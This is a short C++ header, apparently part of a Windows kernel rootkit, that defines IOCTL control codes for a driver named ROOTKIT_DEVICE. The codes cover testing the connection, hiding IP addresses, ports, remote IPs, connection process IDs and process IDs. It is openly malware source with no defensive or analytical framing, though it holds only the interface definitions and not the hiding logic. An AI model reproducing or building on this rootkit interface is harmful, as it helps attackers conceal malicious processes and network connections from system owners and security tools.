#pragma once

#pragma once

constexpr int ROOTKIT_DEVICE = 0x8000;

enum class RookitIoctls 
{
    TestConnection = CTL_CODE(ROOTKIT_DEVICE, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS),
    HideIP = CTL_CODE(ROOTKIT_DEVICE, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS),
    HidePort = CTL_CODE(ROOTKIT_DEVICE, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS),
    HideRemoteIP = CTL_CODE(ROOTKIT_DEVICE, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS),
    HideConnectProcessId = CTL_CODE(ROOTKIT_DEVICE, 0x804, METHOD_BUFFERED, FILE_ANY_ACCESS),
    HideProcessId = CTL_CODE(ROOTKIT_DEVICE, 0x805, METHOD_BUFFERED, FILE_ANY_ACCESS)
};
